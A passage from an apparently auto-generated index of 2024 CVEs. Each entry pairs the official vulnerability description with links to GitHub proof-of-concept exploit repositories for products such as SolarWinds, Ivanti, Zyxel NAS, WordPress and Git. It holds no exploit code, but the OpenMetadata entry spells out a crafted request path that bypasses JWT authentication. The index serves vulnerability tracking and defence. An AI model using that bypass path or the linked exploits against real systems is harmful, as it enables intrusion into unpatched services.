- [JohnDoeAnonITA/CVE-2024-28000](https://github.com/JohnDoeAnonITA/CVE-2024-28000)

### CVE-2024-28085 (2024-03-27)

wall in util-linux through 2.40, often installed with setgid tty permissions, allows escape sequences to be sent to other users' terminals through argv. (Specifically, escape sequences received from stdin are blocked, but escape sequences received from argv are not blocked.) There may be plausible scenarios where this leads to account takeover.

- [skyler-ferrante/CVE-2024-28085](https://github.com/skyler-ferrante/CVE-2024-28085)
- [oditynet/sleepall](https://github.com/oditynet/sleepall)

### CVE-2024-28088 (2024-03-03)

LangChain through 0.1.10 allows ../ directory traversal by an actor who is able to control the final part of the path parameter in a load_chain call. This bypasses the intended behavior of loading configurations only from the hwchase17/langchain-hub GitHub repository. The outcome can be disclosure of an API key for a large language model online service, or remote code execution. (A patch is available as of release 0.1.29 of langchain-core.)

- [levpachmanov/cve-2024-28088-poc](https://github.com/levpachmanov/cve-2024-28088-poc)

### CVE-2024-28116 (2024-03-21)

Grav is an open-source, flat-file content management system. Grav CMS prior to version 1.7.45 is vulnerable to a Server-Side Template Injection (SSTI), which allows any authenticated user (editor permissions are sufficient) to execute arbitrary code on the remote server bypassing the existing security sandbox. Version 1.7.45 contains a patch for this issue.

- [akabe1/Graver](https://github.com/akabe1/Graver)
- [gunzf0x/Grav-CMS-RCE-Authenticated](https://github.com/gunzf0x/Grav-CMS-RCE-Authenticated)
- [geniuszlyy/GenGravSSTIExploit](https://github.com/geniuszlyy/GenGravSSTIExploit)

### CVE-2024-28247 (2024-03-27)

The Pi-hole is a DNS sinkhole that protects your devices from unwanted content without installing any client-side software. A vulnerability has been discovered in Pi-hole that allows an authenticated user on the platform to read internal server files arbitrarily, and because the application runs in the backend, reading files is done as a privileged user. If a URL in the list of "Adlists" begins with "file*", it is understood that it is updating from a local file; if it does not begin with "file*", the behaviour depends on the state of the response. The problem resides in the update through local files. When updating from a file which contains non-domain lines, 5 of the non-domain lines are printed on the screen, so if you provide it with any file on the server which contains non-domain lines it will print them on the screen. This vulnerability is fixed in 5.18.

- [T0X1Cx/CVE-2024-28247-Pi-hole-Arbitrary-File-Read](https://github.com/T0X1Cx/CVE-2024-28247-Pi-hole-Arbitrary-File-Read)

### CVE-2024-28255 (2024-03-15)

OpenMetadata is a unified platform for discovery, observability, and governance powered by a central metadata repository, in-depth lineage, and seamless team collaboration. The `JwtFilter` handles the API authentication by requiring and verifying JWT tokens. When a new request comes in, the request's path is checked against this list. When the request's path contains any of the excluded endpoints the filter returns without validating the JWT. Unfortunately, an attacker may use Path Parameters to make any path contain any arbitrary strings. For example, a request to `GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/111` will match the excluded endpoint condition and therefore will be processed with no JWT validation allowing an attacker to bypass the authentication mechanism and reach any arbitrary endpoint, including the ones listed above that lead to arbitrary SpEL expression injection. This bypass will not work when the endpoint uses the `SecurityContext.getUserPrincipal()` since it will return `null` and will throw an NPE. This issue may lead to authentication bypass and has been addressed in version 1.2.4. Users are advised to upgrade. There are no known workarounds for this vulnerability. This issue is also tracked as `GHSL-2023-237`.

- [YongYe-Security/CVE-2024-28255](https://github.com/YongYe-Security/CVE-2024-28255)

### CVE-2024-28397 (2024-06-20)

An issue in the component js2py.disable_pyimport() of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call.

- [Marven11/CVE-2024-28397-js2py-Sandbox-Escape](https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape)
- [CYBER-WARRIOR-SEC/CVE-2024-28397-js2py-Sandbox-Escape](https://github.com/CYBER-WARRIOR-SEC/CVE-2024-28397-js2py-Sandbox-Escape)

### CVE-2024-28515 (2024-04-03)

Buffer Overflow vulnerability in CSAPP_Lab CSAPP Lab3 15-213 Fall 20xx allows a remote attacker to execute arbitrary code via the lab3 of csapp,lab3/buflab-update.pl component.

- [heshi906/CVE-2024-28515](https://github.com/heshi906/CVE-2024-28515)

### CVE-2024-28589 (2024-04-03)

An issue was discovered in Axigen Mail Server for Windows versions 10.5.18 and before that allows local low-privileged attackers to execute arbitrary code and escalate privileges via insecure DLL loading from a world-writable directory during service initialization.

- [Alaatk/CVE-2024-28589](https://github.com/Alaatk/CVE-2024-28589)

### CVE-2024-28715 (2024-03-19)

Cross Site Scripting vulnerability in DOraCMS v.2.18 and before allows a remote attacker to execute arbitrary code via the markdown0 function in the /app/public/apidoc/oas3/wrap-components/markdown.jsx endpoint.

- [Lq0ne/CVE-2024-28715](https://github.com/Lq0ne/CVE-2024-28715)

### CVE-2024-28741 (2024-04-06)

Cross Site Scripting vulnerability in EginDemirbilek NorthStar C2 v1 allows a remote attacker to execute arbitrary code via the login.php component.

- [chebuya/CVE-2024-28741-northstar-agent-rce-poc](https://github.com/chebuya/CVE-2024-28741-northstar-agent-rce-poc)

### CVE-2024-28757 (2024-03-10)

libexpat through 2.6.1 allows an XML Entity Expansion attack when there is isolated use of external parsers (created via XML_ExternalEntityParserCreate).

- [RenukaSelvar/expat_CVE-2024-28757](https://github.com/RenukaSelvar/expat_CVE-2024-28757)
- [saurabh2088/expat_2_1_0_CVE-2024-28757](https://github.com/saurabh2088/expat_2_1_0_CVE-2024-28757)
- [saurabh2088/expat_2_1_1_CVE-2024-28757](https://github.com/saurabh2088/expat_2_1_1_CVE-2024-28757)

### CVE-2024-28987 (2024-08-21)

The SolarWinds Web Help Desk (WHD) software is affected by a hardcoded credential vulnerability, allowing remote unauthenticated user to access internal functionality and modify data.

- [fa-rrel/CVE-2024-28987-POC](https://github.com/fa-rrel/CVE-2024-28987-POC)
- [horizon3ai/CVE-2024-28987](https://github.com/horizon3ai/CVE-2024-28987)
- [PlayerFridei/CVE-2024-28987](https://github.com/PlayerFridei/CVE-2024-28987)
- [HazeLook/CVE-2024-28987](https://github.com/HazeLook/CVE-2024-28987)
- [Jaden1419/CVE-2024-28987](https://github.com/Jaden1419/CVE-2024-28987)
- [hatvix1/CVE-2024-28987](https://github.com/hatvix1/CVE-2024-28987)

### CVE-2024-28995 (2024-06-06)

SolarWinds Serv-U was susceptible to a directory traversal vulnerability that would allow access to read sensitive files on the host machine.

- [krypton-kry/CVE-2024-28995](https://github.com/krypton-kry/CVE-2024-28995)
- [ggfzx/CVE-2024-28995](https://github.com/ggfzx/CVE-2024-28995)
- [huseyinstif/CVE-2024-28995-Nuclei-Template](https://github.com/huseyinstif/CVE-2024-28995-Nuclei-Template)
- [0xc4t/CVE-2024-28995](https://github.com/0xc4t/CVE-2024-28995)
- [bigb0x/CVE-2024-28995](https://github.com/bigb0x/CVE-2024-28995)
- [muhammetali20/CVE-2024-28995](https://github.com/muhammetali20/CVE-2024-28995)
- [Praison001/CVE-2024-28995-SolarWinds-Serv-U](https://github.com/Praison001/CVE-2024-28995-SolarWinds-Serv-U)
- [Stuub/CVE-2024-28995](https://github.com/Stuub/CVE-2024-28995)
- [gotr00t0day/CVE-2024-28995](https://github.com/gotr00t0day/CVE-2024-28995)

### CVE-2024-28999 (2024-06-04)

The SolarWinds Platform was determined to be affected by a Race Condition Vulnerability affecting the web console.

- [HussainFathy/CVE-2024-28999](https://github.com/HussainFathy/CVE-2024-28999)

### CVE-2024-29050 (2024-04-09)

Windows Cryptographic Services Remote Code Execution Vulnerability

- [Akrachli/CVE-2024-29050](https://github.com/Akrachli/CVE-2024-29050)

### CVE-2024-29059 (2024-03-22)

.NET Framework Information Disclosure Vulnerability

- [codewhitesec/HttpRemotingObjRefLeak](https://github.com/codewhitesec/HttpRemotingObjRefLeak)

### CVE-2024-29269 (2024-04-10)

An issue discovered in Telesquare TLR-2005Ksh 1.0.0 and 1.1.4 allows attackers to run arbitrary system commands via the Cmd parameter.

- [wutalent/CVE-2024-29269](https://github.com/wutalent/CVE-2024-29269)
- [YongYe-Security/CVE-2024-29269](https://github.com/YongYe-Security/CVE-2024-29269)
- [Chocapikk/CVE-2024-29269](https://github.com/Chocapikk/CVE-2024-29269)
- [dream434/CVE-2024-29269](https://github.com/dream434/CVE-2024-29269)
- [K3ysTr0K3R/CVE-2024-29269-EXPLOIT](https://github.com/K3ysTr0K3R/CVE-2024-29269-EXPLOIT)
- [hack-with-rohit/CVE-2024-29269-RCE](https://github.com/hack-with-rohit/CVE-2024-29269-RCE)
- [Quantum-Hacker/CVE-2024-29269](https://github.com/Quantum-Hacker/CVE-2024-29269)

### CVE-2024-29272 (2024-03-22)

Arbitrary File Upload vulnerability in VvvebJs before version 1.7.5, allows unauthenticated remote attackers to execute arbitrary code and obtain sensitive information via the sanitizeFileName parameter in save.php.

- [awjkjflkwlekfdjs/CVE-2024-29272](https://github.com/awjkjflkwlekfdjs/CVE-2024-29272)

### CVE-2024-29275 (2024-03-22)

SQL injection vulnerability in SeaCMS version 12.9, allows remote unauthenticated attackers to execute arbitrary code and obtain sensitive information via the id parameter in class.php.

- [Cyphercoda/nuclei_template](https://github.com/Cyphercoda/nuclei_template)

### CVE-2024-29278 (2024-03-30)

funboot v1.1 is vulnerable to Cross Site Scripting (XSS) via the title field in "create a message."

- [QDming/cve](https://github.com/QDming/cve)

### CVE-2024-29296 (2024-04-10)

A user enumeration vulnerability was found in Portainer CE 2.19.4. This issue occurs during user authentication process, where a difference in response time could allow a remote unauthenticated user to determine if a username is valid or not.

- [ThaySolis/CVE-2024-29296](https://github.com/ThaySolis/CVE-2024-29296)
- [Lavender-exe/CVE-2024-29296-PoC](https://github.com/Lavender-exe/CVE-2024-29296-PoC)

### CVE-2024-29375 (2024-04-04)

CSV Injection vulnerability in Addactis IBNRS v.3.10.3.107 allows a remote attacker to execute arbitrary code via a crafted .ibnrs file to the Project Description, Identifiers, Custom Triangle Name (inside Input Triangles) and Yield Curve Name parameters.

- [ismailcemunver/CVE-2024-29375](https://github.com/ismailcemunver/CVE-2024-29375)

### CVE-2024-29399 (2024-04-11)

An issue was discovered in GNU Savane v.3.13 and before that allows a remote attacker to execute arbitrary code and escalate privileges via a crafted file to the upload.php component.

- [ally-petitt/CVE-2024-29399](https://github.com/ally-petitt/CVE-2024-29399)

### CVE-2024-29415 (-)

The ip package through 2.0.1 for Node.js might allow SSRF because some IP addresses (such as 127.1, 01200034567, 012.1.2.3, 000:0:0000::01, and ::fFFf:127.0.0.1) are improperly categorized as globally routable via isPublic. NOTE: this issue exists because of an incomplete fix for CVE-2023-42282.

- [felipecruz91/node-ip-vex](https://github.com/felipecruz91/node-ip-vex)

### CVE-2024-29510 (2024-07-03)

Artifex Ghostscript before 10.03.1 allows memory corruption, and SAFER sandbox bypass, via format string injection with a uniprint device.

- [swsmith2391/CVE-2024-29510](https://github.com/swsmith2391/CVE-2024-29510)

### CVE-2024-29824 (2024-05-31)

An unspecified SQL Injection vulnerability in Core server of Ivanti EPM 2022 SU5 and prior allows an unauthenticated attacker within the same network to execute arbitrary code.

- [horizon3ai/CVE-2024-29824](https://github.com/horizon3ai/CVE-2024-29824)
- [R4be1/CVE-2024-29824](https://github.com/R4be1/CVE-2024-29824)

### CVE-2024-29847 (2024-09-12)

Deserialization of untrusted data in the agent portal of Ivanti EPM before 2022 SU6, or the 2024 September update allows a remote unauthenticated attacker to achieve remote code execution.

- [sinsinology/CVE-2024-29847](https://github.com/sinsinology/CVE-2024-29847)

### CVE-2024-29849 (2024-05-22)

Veeam Backup Enterprise Manager allows unauthenticated users to log in as any user to enterprise manager web interface.

- [sinsinology/CVE-2024-29849](https://github.com/sinsinology/CVE-2024-29849)

### CVE-2024-29855 (2024-06-11)

Hard-coded JWT secret allows authentication bypass in Veeam Recovery Orchestrator

- [sinsinology/CVE-2024-29855](https://github.com/sinsinology/CVE-2024-29855)

### CVE-2024-29863 (2024-04-05)

A race condition in the installer executable in Qlik Qlikview before versions May 2022 SR3 (12.70.20300) and May 2023 SR2 (12,80.20200) may allow an existing lower privileged user to cause code to be executed in the context of a Windows Administrator.

- [pawlokk/qlikview-poc-CVE-2024-29863](https://github.com/pawlokk/qlikview-poc-CVE-2024-29863)

### CVE-2024-29868 (2024-06-24)

Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) vulnerability in Apache StreamPipes user self-registration and password recovery mechanism.
This allows an attacker to guess the recovery token in a reasonable time and thereby to take over the attacked user's account.
This issue affects Apache StreamPipes: from 0.69.0 through 0.93.0.

Users are recommended to upgrade to version 0.95.0, which fixes the issue.

- [DEVisions/CVE-2024-29868](https://github.com/DEVisions/CVE-2024-29868)

### CVE-2024-29895 (2024-05-13)

Cacti provides an operational monitoring and fault management framework. A command injection vulnerability on the 1.3.x DEV branch allows any unauthenticated user to execute arbitrary command on the server when `register_argc_argv` option of PHP is `On`. In `cmd_realtime.php` line 119, the `$poller_id` used as part of the command execution is sourced from `$_SERVER['argv']`, which can be controlled by URL when `register_argc_argv` option of PHP is `On`. And this option is `On` by default in many environments such as the main PHP Docker image for PHP. Commit 53e8014d1f082034e0646edc6286cde3800c683d contains a patch for the issue, but this commit was reverted in commit 99633903cad0de5ace636249de16f77e57a3c8fc.

- [Stuub/CVE-2024-29895-CactiRCE-PoC](https://github.com/Stuub/CVE-2024-29895-CactiRCE-PoC)
- [secunnix/CVE-2024-29895](https://github.com/secunnix/CVE-2024-29895)
- [ticofookfook/CVE-2024-29895.py](https://github.com/ticofookfook/CVE-2024-29895.py)
- [Rubioo02/CVE-2024-29895](https://github.com/Rubioo02/CVE-2024-29895)

### CVE-2024-29943 (2024-03-22)

An attacker was able to perform an out-of-bounds read or write on a JavaScript object by fooling range-based bounds check elimination. This vulnerability affects Firefox < 124.0.1.

- [bjrjk/CVE-2024-29943](https://github.com/bjrjk/CVE-2024-29943)

### CVE-2024-29972 (2024-06-04)

** UNSUPPORTED WHEN ASSIGNED **
The command injection vulnerability in the CGI program "remote_help-cgi" in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request.

- [WanLiChangChengWanLiChang/CVE-2024-29972](https://github.com/WanLiChangChengWanLiChang/CVE-2024-29972)
- [Pommaq/CVE-2024-29972-CVE-2024-29976-CVE-2024-29973-CVE-2024-29975-CVE-2024-29974-poc](https://github.com/Pommaq/CVE-2024-29972-CVE-2024-29976-CVE-2024-29973-CVE-2024-29975-CVE-2024-29974-poc)

### CVE-2024-29973 (2024-06-04)

** UNSUPPORTED WHEN ASSIGNED **
The command injection vulnerability in the "setCookie" parameter in Zyxel NAS326 firmware versions before V5.21(AAZF.17)C0 and NAS542 firmware versions before V5.21(ABAG.14)C0 could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request.

- [momika233/CVE-2024-29973](https://github.com/momika233/CVE-2024-29973)
- [bigb0x/CVE-2024-29973](https://github.com/bigb0x/CVE-2024-29973)
- [k3lpi3b4nsh33/CVE-2024-29973](https://github.com/k3lpi3b4nsh33/CVE-2024-29973)
- [p0et08/CVE-2024-29973](https://github.com/p0et08/CVE-2024-29973)
- [RevoltSecurities/CVE-2024-29973](https://github.com/RevoltSecurities/CVE-2024-29973)
- [skyrowalker/CVE-2024-29973](https://github.com/skyrowalker/CVE-2024-29973)

### CVE-2024-29988 (2024-04-09)

SmartScreen Prompt Security Feature Bypass Vulnerability

- [Sploitus/CVE-2024-29988-exploit](https://github.com/Sploitus/CVE-2024-29988-exploit)

### CVE-2024-30043 (2024-05-14)

Microsoft SharePoint Server Information Disclosure Vulnerability

- [W01fh4cker/CVE-2024-30043-XXE](https://github.com/W01fh4cker/CVE-2024-30043-XXE)

### CVE-2024-30051 (2024-05-14)

Windows DWM Core Library Elevation of Privilege Vulnerability

- [fortra/CVE-2024-30051](https://github.com/fortra/CVE-2024-30051)

### CVE-2024-30052 (2024-06-11)

Visual Studio Remote Code Execution Vulnerability

- [ynwarcs/CVE-2024-30052](https://github.com/ynwarcs/CVE-2024-30052)

### CVE-2024-30056 (2024-05-25)

Microsoft Edge (Chromium-based) Information Disclosure Vulnerability

- [absholi7ly/Microsoft-Edge-Information-Disclosure](https://github.com/absholi7ly/Microsoft-Edge-Information-Disclosure)

### CVE-2024-30088 (2024-06-11)

Windows Kernel Elevation of Privilege Vulnerability

- [tykawaii98/CVE-2024-30088](https://github.com/tykawaii98/CVE-2024-30088)
- [NextGenPentesters/CVE-2024-30088-](https://github.com/NextGenPentesters/CVE-2024-30088-)
- [Zombie-Kaiser/CVE-2024-30088-Windows-poc](https://github.com/Zombie-Kaiser/CVE-2024-30088-Windows-poc)
- [exploits-forsale/collateral-damage](https://github.com/exploits-forsale/collateral-damage)
- [Admin9961/CVE-2024-30088](https://github.com/Admin9961/CVE-2024-30088)
- [Justintroup85/exploits-forsale-collateral-damage](https://github.com/Justintroup85/exploits-forsale-collateral-damage)

### CVE-2024-30090 (2024-06-11)

Microsoft Streaming Service Elevation of Privilege Vulnerability

- [Dor00tkit/CVE-2024-30090](https://github.com/Dor00tkit/CVE-2024-30090)

### CVE-2024-30212 (2024-05-28)

If a SCSI READ(10) command is initiated via USB using the largest LBA (0xFFFFFFFF) with its default block size of 512 and a count of 1, the first 512 bytes of the 0x80000000 memory area are returned to the user. If the block count is increased, the full RAM can be exposed.

The same method works to write to this memory area. If RAM contains pointers, those can be, depending on the application, overwritten to return data from any other offset including Program and Boot Flash.

- [Fehr-GmbH/blackleak](https://github.com/Fehr-GmbH/blackleak)

### CVE-2024-30255 (2024-04-04)

Envoy is a cloud-native, open source edge and service proxy. The HTTP/2 protocol stack in Envoy versions prior to 1.29.3, 1.28.2, 1.27.4, and 1.26.8 are vulnerable to CPU exhaustion due to flood of CONTINUATION frames. Envoy's HTTP/2 codec allows the client to send an unlimited number of CONTINUATION frames even after exceeding Envoy's header map limits. This allows an attacker to send a sequence of CONTINUATION frames without the END_HEADERS bit set causing CPU utilization, consuming approximately 1 core per 300Mbit/s of traffic and culminating in denial of service through CPU exhaustion. Users should upgrade to version 1.29.3, 1.28.2, 1.27.4, or 1.26.8 to mitigate the effects of the CONTINUATION flood. As a workaround, disable HTTP/2 protocol for downstream connections.

- [blackmagic2023/Envoy-CPU-Exhaustion-Vulnerability-PoC](https://github.com/blackmagic2023/Envoy-CPU-Exhaustion-Vulnerability-PoC)

### CVE-2024-30270 (2024-04-04)

mailcow: dockerized is an open source groupware/email suite based on docker. A security vulnerability has been identified in mailcow affecting versions prior to 2024-04. This vulnerability is a combination of path traversal and arbitrary code execution, specifically targeting the `rspamd_maps()` function. It allows authenticated admin users to overwrite any file writable by the www-data user by exploiting improper path validation. The exploit chain can lead to the execution of arbitrary commands on the server. Version 2024-04 contains a patch for the issue.

- [Alchemist3dot14/CVE-2024-30270-PoC](https://github.com/Alchemist3dot14/CVE-2024-30270-PoC)

### CVE-2024-30491 (2024-03-29)

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Metagauss ProfileGrid. This issue affects ProfileGrid: from n/a through 5.7.8.

- [truonghuuphuc/CVE-2024-30491-Poc](https://github.com/truonghuuphuc/CVE-2024-30491-Poc)

### CVE-2024-30614 (2024-04-12)

An issue in Ametys CMS v4.5.0 and before allows attackers to obtain sensitive information via exposed resources to the error scope.

- [Lucky-lm/CVE-2024-30614](https://github.com/Lucky-lm/CVE-2024-30614)

### CVE-2024-30656 (2024-04-15)

An issue in Fireboltt Dream Wristphone BSW202_FB_AAC_v2.0_20240110-20240110-1956 allows attackers to cause a Denial of Service (DoS) via a crafted deauth frame.

- [Yashodhanvivek/Firebolt-wristphone-vulnerability](https://github.com/Yashodhanvivek/Firebolt-wristphone-vulnerability)

### CVE-2024-30850 (2024-04-12)

An issue in tiagorlampert CHAOS v5.0.1 allows a remote attacker to execute arbitrary code via the BuildClient function within client_service.go.

- [chebuya/CVE-2024-30850-chaos-rat-rce-poc](https://github.com/chebuya/CVE-2024-30850-chaos-rat-rce-poc)

### CVE-2024-30851 (2024-05-03)

Directory Traversal vulnerability in codesiddhant Jasmin Ransomware v.1.0.1 allows an attacker to obtain sensitive information via the download_file.php component.

- [chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc](https://github.com/chebuya/CVE-2024-30851-jasmin-ransomware-path-traversal-poc)

### CVE-2024-30875
- [Ant1sec-ops/CVE-2024-30875](https://github.com/Ant1sec-ops/CVE-2024-30875)

### CVE-2024-30896
- [XenoM0rph97/CVE-2024-30896](https://github.com/XenoM0rph97/CVE-2024-30896)

### CVE-2024-30956
- [leoCottret/CVE-2024-30956](https://github.com/leoCottret/CVE-2024-30956)

### CVE-2024-30973 (2024-05-06)

An issue in V-SOL G/EPON ONU HG323AC-B with firmware version V2.0.08-210715 allows an attacker to execute arbitrary code and obtain sensitive information via crafted POST requests to /boaform/getASPdata/formFirewall and /boaform/getASPdata/formAcc.

- [Athos-Zago/CVE-2024-30973](https://github.com/Athos-Zago/CVE-2024-30973)

### CVE-2024-30998 (2024-04-03)

SQL Injection vulnerability in PHPGurukul Men Salon Management System v.2.0, allows remote attackers to execute arbitrary code and obtain sensitive information via the email parameter in the index.php component.

- [efekaanakkar/CVE-2024-30998](https://github.com/efekaanakkar/CVE-2024-30998)

### CVE-2024-31210 (2024-04-04)

WordPress is an open publishing platform for the Web. It's possible for a file of a type other than a zip file to be submitted as a new plugin by an administrative user on the Plugins -> Add New -> Upload Plugin screen in WordPress. If FTP credentials are requested for installation (in order to move the file into place outside of the `uploads` directory) then the uploaded file remains temporarily available in the Media Library despite it not being allowed. If the `DISALLOW_FILE_EDIT` constant is set to `true` on the site _and_ FTP credentials are required when uploading a new theme or plugin, then this technically allows an RCE when the user would otherwise have no means of executing arbitrary PHP code. This issue _only_ affects Administrator level users on single site installations, and Super Admin level users on Multisite installations where it's otherwise expected that the user does not have permission to upload or execute arbitrary PHP code. Lower level users are not affected. Sites where the `DISALLOW_FILE_MODS` constant is set to `true` are not affected. Sites where an administrative user either does not need to enter FTP credentials or has access to the valid FTP credentials are not affected. The issue was fixed in WordPress 6.4.3 on January 30, 2024 and backported to versions 6.3.3, 6.2.4, 6.1.5, 6.0.7, 5.9.9, 5.8.9, 5.7.11, 5.6.13, 5.5.14, 5.4.15, 5.3.17, 5.2.20, 5.1.18, 5.0.21, 4.9.25, 2.8.24, 4.7.28, 4.6.28, 4.5.31, 4.4.32, 4.3.33, 4.2.37, and 4.1.40. A workaround is available. If the `DISALLOW_FILE_MODS` constant is defined as `true` then it will not be possible for any user to upload a plugin and therefore this issue will not be exploitable.

- [Abo5/CVE-2024-31210](https://github.com/Abo5/CVE-2024-31210)

### CVE-2024-31211 (2024-04-04)

WordPress is an open publishing platform for the Web. Unserialization of instances of the `WP_HTML_Token` class allows for code execution via its `__destruct()` magic method. This issue was fixed in WordPress 6.4.2 on December 6th, 2023. Versions prior to 6.4.0 are not affected.

- [Abdurahmon3236/-CVE-2024-31211](https://github.com/Abdurahmon3236/-CVE-2024-31211)

### CVE-2024-31319 (2024-07-09)

In updateNotificationChannelFromPrivilegedListener of NotificationManagerService.java, there is a possible cross-user data leak due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.

- [23Nero/fix-02-failure-CVE-2024-31319-CVE-2024-0039](https://github.com/23Nero/fix-02-failure-CVE-2024-31319-CVE-2024-0039)

### CVE-2024-31351 (2024-05-17)

Unrestricted Upload of File with Dangerous Type vulnerability in Copymatic Copymatic – AI Content Writer & Generator. This issue affects Copymatic – AI Content Writer & Generator: from n/a through 1.6.

- [KTN1990/CVE-2024-31351_wordpress_exploit](https://github.com/KTN1990/CVE-2024-31351_wordpress_exploit)

### CVE-2024-31497 (2024-04-15)

In PuTTY 0.68 through 0.80 before 0.81, biased ECDSA nonce generation allows an attacker to recover a user's NIST P-521 secret key via a quick attack in approximately 60 signatures. This is especially important in a scenario where an adversary is able to read messages signed by PuTTY or Pageant. The required set of signed messages may be publicly readable because they are stored in a public Git service that supports use of SSH for commit signing, and the signatures were made by Pageant through an agent-forwarding mechanism. In other words, an adversary may already have enough signature information to compromise a victim's private key, even if there is no further use of vulnerable PuTTY versions. After a key compromise, an adversary may be able to conduct supply-chain attacks on software maintained in Git. A second, independent scenario is that the adversary is an operator of an SSH server to which the victim authenticates (for remote login or file copy), even though this server is not fully trusted by the victim, and the victim uses the same private key for SSH connections to other services operated by other entities. Here, the rogue server operator (who would otherwise have no way to determine the victim's private key) can derive the victim's private key, and then use it for unauthorized access to those other services. If the other services include Git services, then again it may be possible to conduct supply-chain attacks on software maintained in Git. This also affects, for example, FileZilla before 3.67.0, WinSCP before 6.3.3, TortoiseGit before 2.15.0.1, and TortoiseSVN through 1.14.6.

- [sh1k4ku/CVE-2024-31497](https://github.com/sh1k4ku/CVE-2024-31497)
- [edutko/cve-2024-31497](https://github.com/edutko/cve-2024-31497)
- [HugoBond/CVE-2024-31497-POC](https://github.com/HugoBond/CVE-2024-31497-POC)

### CVE-2024-31666 (2024-04-22)

An issue in flusity-CMS v.2.33 allows a remote attacker to execute arbitrary code via a crafted script to the edit_addon_post.php component.

- [hapa3/CVE-2024-31666](https://github.com/hapa3/CVE-2024-31666)

### CVE-2024-31719
- [VoltaireYoung/CVE-2024-31719----AMI-Aptio-5-Vulnerability](https://github.com/VoltaireYoung/CVE-2024-31719----AMI-Aptio-5-Vulnerability)

### CVE-2024-31771 (-)

Insecure Permission vulnerability in TotalAV v.6.0.740 allows a local attacker to escalate privileges via a crafted file.

- [restdone/CVE-2024-31771](https://github.com/restdone/CVE-2024-31771)

### CVE-2024-31777 (2024-06-13)

File Upload vulnerability in openeclass v.3.15 and before allows an attacker to execute arbitrary code via a crafted file to the certbadge.php endpoint.

- [FreySolarEye/Exploit-CVE-2024-31777](https://github.com/FreySolarEye/Exploit-CVE-2024-31777)

### CVE-2024-31819 (2024-04-10)

An issue in WWBN AVideo v.12.4 through v.14.2 allows a remote attacker to execute arbitrary code via the systemRootPath parameter of the submitIndex.php component.

- [Chocapikk/CVE-2024-31819](https://github.com/Chocapikk/CVE-2024-31819)
- [dream434/CVE-2024-31819](https://github.com/dream434/CVE-2024-31819)

### CVE-2024-31835
- [paragbagul111/CVE-2024-31835](https://github.com/paragbagul111/CVE-2024-31835)

### CVE-2024-31848 (2024-04-05)

A path traversal vulnerability exists in the Java version of CData API Server < 23.4.8844 when running using the embedded Jetty server, which could allow an unauthenticated remote attacker to gain complete administrative access to the application.

- [Stuub/CVE-2024-31848-PoC](https://github.com/Stuub/CVE-2024-31848-PoC)

### CVE-2024-31974 (-)

The com.solarized.firedown (aka Solarized FireDown Browser & Downloader) application 1.0.76 for Android allows a remote attacker to execute arbitrary JavaScript code via a crafted intent. com.solarized.firedown.IntentActivity uses a WebView component to display web content and doesn't adequately sanitize the URI or any extra data passed in the intent by any installed application (with no permissions).

- [actuator/com.solarized.firedown](https://github.com/actuator/com.solarized.firedown)

### CVE-2024-31982 (2024-04-10)

XWiki Platform is a generic wiki platform. Starting in version 2.4-milestone-1 and prior to versions 4.10.20, 15.5.4, and 15.10-rc-1, XWiki's database search allows remote code execution through the search text. This allows remote code execution for any visitor of a public wiki or user of a closed wiki as the database search is by default accessible for all users. This impacts the confidentiality, integrity and availability of the whole XWiki installation. This vulnerability has been patched in XWiki 14.10.20, 15.5.4 and 15.10RC1. As a workaround, one may manually apply the patch to the page `Main.DatabaseSearch`. Alternatively, unless database search is explicitly used by users, this page can be deleted as this is not the default search interface of XWiki.

- [k3lpi3b4nsh33/CVE-2024-31982](https://github.com/k3lpi3b4nsh33/CVE-2024-31982)
- [th3gokul/CVE-2024-31982](https://github.com/th3gokul/CVE-2024-31982)
- [bigb0x/CVE-2024-31982](https://github.com/bigb0x/CVE-2024-31982)

### CVE-2024-31989 (2024-05-21)

Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. It has been discovered that an unprivileged pod in a different namespace on the same cluster could connect to the Redis server on port 6379. Despite having installed the latest version of the VPC CNI plugin on the EKS cluster, it requires manual enablement through configuration to enforce network policies. This raises concerns that many clients might unknowingly have open access to their Redis servers. This vulnerability could lead to Privilege Escalation to the level of cluster controller, or to information leakage, affecting anyone who does not have strict access controls on their Redis instance. This issue has been patched in version(s) 2.8.19, 2.9.15 and 2.10.10.

- [vt0x78/CVE-2024-31989](https://github.com/vt0x78/CVE-2024-31989)

### CVE-2024-32002 (2024-05-14)

Git is a revision control system. Prior to versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4, repositories with submodules can be crafted in a way that exploits a bug in Git whereby it can be fooled into writing files not into the submodule's worktree but into a `.git/` directory. This allows writing a hook that will be executed while the clone operation is still running, giving the user no opportunity to inspect the code that is being executed. The problem has been patched in versions 2.45.1, 2.44.1, 2.43.4, 2.42.2, 2.41.1, 2.40.2, and 2.39.4. If symbolic link support is disabled in Git (e.g. via `git config --global core.symlinks false`), the described attack won't work. As always, it is best to avoid cloning repositories from untrusted sources.

- [markuta/CVE-2024-32002](https://github.com/markuta/CVE-2024-32002)
- [markuta/hooky](https://github.com/markuta/hooky)
- [amalmurali47/git_rce](https://github.com/amalmurali47/git_rce)
- [amalmurali47/hook](https://github.com/amalmurali47/hook)
- [M507/CVE-2024-32002](https://github.com/M507/CVE-2024-32002)
- [JakobTheDev/cve-2024-32002-submodule-rce](https://github.com/JakobTheDev/cve-2024-32002-submodule-rce)
- [JakobTheDev/cve-2024-32002-poc-rce](https://github.com/JakobTheDev/cve-2024-32002-poc-rce)
- [safebuffer/CVE-2024-32002](https://github.com/safebuffer/CVE-2024-32002)
- [10cks/CVE-2024-32002-POC](https://github.com/10cks/CVE-2024-32002-POC)
- [10cks/CVE-2024-32002-hulk](https://github.com/10cks/CVE-2024-32002-hulk)
- [10cks/CVE-2024-32002-submod](https://github.com/10cks/CVE-2024-32002-submod)
